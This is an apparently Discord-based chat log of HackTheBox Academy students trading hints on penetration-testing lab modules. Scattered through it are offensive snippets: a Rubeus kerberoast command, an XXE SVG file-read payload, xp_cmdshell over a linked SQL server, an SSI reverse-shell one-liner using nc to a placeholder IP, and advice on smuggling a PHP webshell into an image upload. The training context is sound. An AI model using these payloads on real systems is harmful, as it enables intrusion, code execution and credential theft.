Hey gang, I’m on the windows attacks and defense course I’m in the kerbroasting module. I ran .\Rubeus.exe kerberoast /outfile:spn.txt it worked I see the administrator info. How do I transfer from this windows machine with no internet to my kali Linux?

you're connected directly to the windows box. try hosting an upload server on your kali box, and upload the file to that server from the windows box

On information gathering web edition path “Active subdomain enumeration” module eventhough I had put in place the target_IP on etc/hosts file with host name inlanefreight.htb when I query NS lookup for nameservers it gives me NXdomain why is that?

if you're on VMware, simply copy the hash and paste into a text file

nslookup -type=NS inlanefreight.htb

now that i think about it, you should just be able to copy the text in the RDP session and paste it into a text file

hello guys
i am stuck in file upload module skill assessment for days could anyone help me? I can't get the upload.php because the server reponding with a base64 masseges
i use this way
some bytes from a real image + this payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/contact/upload.php"> ]>
<svg>&xxe;</svg>

filename = images.svg.png
Content-Type: image/svg+xml

Have you tried to decode the base64? Quick glance at your payload, it looks similar to my notes.

yes and it looks exactly as the what i send

I don't have an =/contact... just =filenaname... also used a different extension than you, not sure if .svg.png will work as you expect. Would look into potentially different php extensions.

is there another way to get the source code of .php file that modifying a .svg image ?

I don't think you have to mess with that, just play around with some other names than .svg. as taught in that module if I remember correctly .

ok i will try, thanks for responding 👍

can anyone help me with the Attackting common services module hard challenge? The error I'm receiving is

||1> EXECUTE("EXECUTE LOGIN AS 'sa'; xp_cmdshell 'whoami'" ) AT [WINSRV02\SQLEXPRESS]
2> go
Msg 7437, Level 16, State 1, Server WIN-HARD\SQLEXPRESS, Line 1
Linked servers cannot be used under impersonation without a mapping for the impersonated login.||

||I'm impersonating user john||

NMAP: Firewall Evasion: Using Decoys
A critical point mentioned is that the decoys must be active; however, we have no control over the random IP addresses generated if we are using RND. We cannot make sure that the decoys are active. Plus, the ISP/routers filter the spoofed packets.
I understand that decoys can be used only if we have multiple VPS running, and instead of random, we can specify the IP addresses.
I wanted to clarify: Am I missing something?

Try just executing login as the person you're trying to impersonate and build up from there

Hiii, i have problems with te lab of documentation and reporting-skills, i dont have idea how resolve the machine, can you help me ? 😦

if any body here know how to use haproxy. I'm facing a few problems...

I don’t have the credentials for that user. I’ll try to find the credentials for him and see.

dm me

gubarz is correct

Yeo guys

so I got a question in the pivoting moduel, section rdp socksoverrdp I am trying to regsvr32.exe a dll, buttttttttt, it keeps deleting it after giving me an error, I have made sure that the defender and antivirus is off

this is the error

now it says the module couldn't be found

and then it gets deleted

yeah the anti virus is still on my guy

it is not tho

i just completed that module rn llol

i checked it

can you screen shot it that it is off just to confirm

okay there was a small option that was on but now I get a different error

sad times

whats the error this time lol

run it as administrator

just in case

run the command line as administrator and the command you are running

Yeah I figured

PoC and Patching - Validation Logic Disparity Can someone help me? I have no idea about this at all

can I dm you? I got a question

Hi, need some help with the module "Intermediate Network Traffic Analysis" skill assessment portion. Can't seem to get the answer right even when using the provided options. Answer format: "DNS Flooding", "DNS Amplification", "DNS Tunneling" or Answer format: "ICMP Flooding", "ICMP Tunneling", "ICMP SMURF Attack"

yeah

bro do you solved this

https://www.semperis.com/blog/new-attack-paths-as-requested-sts/

kerberoast without pre-authenticate

i have some questions about it
How are these types of attacks requesting TGS tickets? The session key in AS-REP is encrypted using the user's key, while requesting TGS tickets requires encrypting the timestamp using the session key. If we don't know the user's password, how is this attack successfully executed? Brute force the key?

https://academy.hackthebox.com/module/28/section/745,For the first three questions in this part, I found the geographical location, but I don’t know why the answer is still wrong. If anyone has solved this part, can you send me a private message? Thank you in advance.

How are these types of attacks requesting TGS tickets? The session key in AS-REP is encrypted using the user's key, while requesting TGS tickets requires encrypting the timestamp using the session key. If we don't know the user's password, how is this attack successfully executed? Brute force the key?

it's literally explained in the article you linked

When a ticket is requested without pre-authentication, the result still includes an encrypted part. This encrypted part is encrypted with the credential key used for authentication and contains the session key for the ticket included within the reply. This is the encrypted data used in the ASREPRoast attack by Will Schroeder. The resulting TGT is usable only with access to the requesting accounts key, since the TGT session key is required.

However, for Kerberoasting, access to the session key is not required. Only the resulting ST—or more accurately, the encrypted part of the ST, which is not secured with the requesting accounts key—is required. Therefore, if any account is configured to not require pre-authentication, it is possible to Kerberoast without any credentials.

also, off topic, this does not relate to any modules or academy

it's part of the module 'attack kerberos'

thanks,
my poor English led me to misunderstand the original text's meaning.

I solved this,if anyone need help please dm me

Guys what am I doing wrong ?

regarding notetaking for academy modules, what do you guys think about taking notes by hand for a module first (for retaining the information better) and then transcribing those notes to Obsidian (for finding the information better when needed) ?

Just do it in obsidian immediately

thing is, if I don't type it by hand, I don't really retain the concepts so well

Then why ask lol

just wondering if anyone else has a similar strategy 🤷‍♂️

you can dm me

If you understand it, you will rarely need notes

I expect you would need at least a digital methodolgy or runbook, so you don't waste time during the exam

yeah this is a good idea

just because you typed the it in /etc/hosts it doesnt mean nslookup will follow it. nslookup doesnt know it should use the <IP> of the DNS server target if you dont specify

and im pretty sure the questions you do there, you dont need to add anything to etc/hosts

you just missing the IP since nslookup takes the default one and well doesnt work with the default one (i think the default is1.1.1.1)

You need to add the ip, .htb isn't a valid tld so public nameservers won't resolve it

nslookup [options] domain nameserver/ip

Can someone help me with this, please? I am not able to get the auth token after re-signing the assertion.

Yes, I completed. Did you use the python script provided in the module to brute force the token?

https://academy.hackthebox.com/module/145/section/1303
need help here im pasting the payload:

<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

with the right ip and port i've opened an nc connection on my end and not getting the reverse shell am i doing something wrong?

Guys let’s connect please like this post also https://www.linkedin.com/posts/imayankchawla_hackachino-hackathon-codingchallenge-activity-7182328330128355328-nmcG?utm_source=share&utm_medium=member_ios

why are you posting that here?

Hello everyone, can anyone help me solve Broken Authentication Predictable Reset Token, question 1? I don't know what's wrong with the script. I don't know if the time is not set correctly, and I haven't been able to get the correct token. Can anyone help me figure it out?

try some other revshells maybe

#modules message

that is the only one that is reccomended in the module but ill look online

Someone please 😭.

Yes, I converted the UTC time and generated 2000 tokens, but none of them were correct. I tried many times and couldn't find the problem. Can you help me take a look?

is the string you used to generate the hash correct

use it to read the source code of the upload page.

I did.

I know how it's imported etc.

I know the dir & the name of file.

Just I tried to use some payloads using ||XXE|| vuln but the server was not answering or not giving any info.

To get the flag.

I found ||XSS|| as well.

Tried some payloads and nothing.

rdp sucks again

I was trying to find an extension for the webshell because I tried to access to it from URL but "DId not found", and after looking at code I g uess the extension was blocked, so I was trying to run Intruder to find a correct extension and... "Error" after reseting a lot of times the lab, restarted my Burp... So I don't know what do.

i am so pissed of the performance of the academy

and yes i wrote to the support

you don't need all that.
aren't you doing file upload?

it sucks when doing some modules, like Windows P.E

Now I'm just not sure if the time conversion is correct or not. Don't know how to be sure.

guess where i am at 🙂

you can just use a timezone converter to check

Performance is a question of various factors.
Server performance and internal network are things that HTB can influence.
Your PC and your internal network are things that you can influence.
Everything in between, neither you nor HTB can influence

Hello

I am stuck on PtT with Linux in the password attacks module.
the question is
Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

I found the kt file and got an aes256 hash from it

what do I do now? I tried but couldnt crack it with hashcat

true i got 100 mbit+ and a brand new XMG notebook

pings are 1000 + sometimes

EU vpn is slower then US , i am from EU

^

Mine disconnected 3 times last night. twice within a span of 1 minute

afaik, there is more than one kt in there directory.

you are cracking the wrong one.

um ok

Yes, but if you are at home in the Middle East, Africa or Asia, for example, then the defective submarine cables could slow you down massively

I am trying...

i am from germany

I know the directory but when I am trying to find a valid extension, Burp is saying for all my requests that there is an error, I just used §.ext§ in Intruder.

unrelated question but how did you get the clown thing around your profile?

dt_obj = datetime.strptime(time_str_with_space, "%Y-%m-%d %I:%M:%S %p")
utc_dt_obj = dt_obj.replace(tzinfo=timezone.utc)
milliseconds_timestamp = int(utc_dt_obj.timestamp() * 1000)
print("milliseconds_timestamp:", milliseconds_timestamp)

That is strange. Check the Routing

Im am from Switzerland

i use my own kali

Discord lootbocks.

in a vm

what error are you getting exactly, you are prolly fuzzing with the wrong extension format.
if you are fuzzing §.ext§, make sure the extensions are also in a .ext format..

Is that so?

i'll try EU 1 vpn again but its annoying

Im in India. maybe thats why its bad for me.
I have really good wifi and a rtx 3070 + Ryzen 9 gaming laptop

I sent you SS in DMs.

27 ms must be nice xd.

Hey that is the only one. is it possible to just use the ticket instead of cracking?

should check it yourself

ok

Thank you!

how an i get them?

How does your provider route the data to the US, EU?

did you go into the directory?

it's an april fools thing, you can't get it anymore

How does your provider route the data?
If the routing is crap, a high-speed connection is of no use at all

feelsbadman

Bro May I DM you if you are done with this part? I can send you the ss of my progress

64 bytes from 10.129.43.13: icmp_seq=1 ttl=127 time=1746 ms
64 bytes from 10.129.43.13: icmp_seq=2 ttl=127 time=790 ms
64 bytes from 10.129.43.13: icmp_seq=3 ttl=127 time=1955 ms
64 bytes from 10.129.43.13: icmp_seq=4 ttl=127 time=1000 ms
64 bytes from 10.129.43.13: icmp_seq=5 ttl=127 time=15.7 ms
64 bytes from 10.129.43.13: icmp_seq=6 ttl=127 time=1149 ms
64 bytes from 10.129.43.13: icmp_seq=7 ttl=127 time=203 ms
64 bytes from 10.129.43.13: icmp_seq=8 ttl=127 time=1370 ms
64 bytes from 10.129.43.13: icmp_seq=9 ttl=127 time=413 ms
64 bytes from 10.129.43.13: icmp_seq=10 ttl=127 time=1572 ms
64 bytes from 10.129.43.13: icmp_seq=11 ttl=127 time=621 ms

ok

ok thanks

EU VPN 1 TCP

Do a traceroute

ok to dm you @acoustic owl ?

sure

i have problem with the lab at the end of containers-linux privilege escalation module

can you be more specific?

i reached the last point and when i execute (lxc exec privesc /bin/bash)

it gives me error command not found

specify another shell other than bash

like sh

mmm , can you tell me why listeing /bin from regurals user is different from lxc exec privesc ls /bin

Hello. I would like to get a subscription, but recurly.com is not accepting PayPal and I can't add my credit card. Does anyone having similar issues?

I mean /bin/sh.

i know that , but my question is what is lxc exec privesc ls /bin

listing

I dont get you.

no problem , thanks for your help , i got the flag

anyone need some module help also can dm me

Reach out to support

Hi any one is using the VPN instead of the PWNBox? I'm having problem since the exploit from MSF constantly fail while in the PWNBox are working perfectly. VNP is working since I can scan, fuzz, etc . Could it be the VPN's delay to make them fail?

section:Domain Structure
question:What is the hosting provider for the inlanefreight.com domain?``` why I use whois to check this it not have answer,I found it about Amazon.if anyone finished it please help me.

Guys I am stuck at Protected Files module in Password attacks , The question is asking for Kira's password which I believe I got in previous modules but the problem is I had a long break and I am continuing the modules , Can anyone guide me in which module I can find Kira's Password?

You are looking for the hosting provider. In other words, where the website is hosted

I think I have a rough idea, but to prevent spoilers I won't reveal it here

does someone here know if the password reset / set password not working in "Advanced XSS and CSRF Exploitation" Is intentional or not?

specifically section "Launching Attacks from the Victim's Session"

Are you working on a new module in HTB?

or how?

anyone i can ask for a nudge on "LDAP - Data Exfiltration & Blind Exploitation"
i have a script, but cant seem to get it working
idk if its my coding abilities or whatnot

I did not solve it using the reset function

can i post my script here @acoustic owl

?

most likely something random im too stupid to see lol

@acoustic owl thanks

doesnt even work so its not like a exploit

So as not to spoil anything, send it to me via dm

which module?

dmed you

whic module

Injection attacks

If you not solved you can dm

For the module you're talking about,just make use of what's taught

👍

i just manged to solve it

but thanks!

where is channel for pro labs?

hello guys
I am stuck in skill assessment of file upload module
the issue that i can't find the file that I am uploading (it's uploaded successfully but I could not find it)

any mod or pro here guys??

i need help 😭

and im also lost in the channels

http://x.x.x.x:port/contact/user_feedback_submissions/240306_shell.phar.jpeg

which section??

should I name the file like this 240306_shell.phar.jpeg ?

skills assessment - file upload attacks

change "240306" to "240406"

"shell.phar.jpeg" is the payload that you uploaded

yes

still does not work
I use exiftool to include a php payload inside a 240406_shell.jpeg then upload it

what doesn't work exactly?

can u show the error you getting

ask your question and someone may be able to help

404 not found

when you upload a file through upload.php, it will automatically add "YYMMDD" as a prefix. Therefore if you uploaded a shell named "shell.phar.jpeg", then the actual name on that server should be "240406_shell.phar.jpeg"

this should work for you @real blade , assuming you didn't miss any steps

well, i got scammed by the hacked id of an old good friend and couldnt understand and now my id got hacked

there's so many important things and so many memories (4 years to be exact)

i asked discord support and they couldnt help 😭

thank you so much i got it

yes it works

well we certainly cannot help with that. that's a discord issue, reach out to support again.

may i ask you a question plz ?
@deep bay @crystal steeple
how did you figure it out that the server is adding "YYMMDD"?

it's was in the source code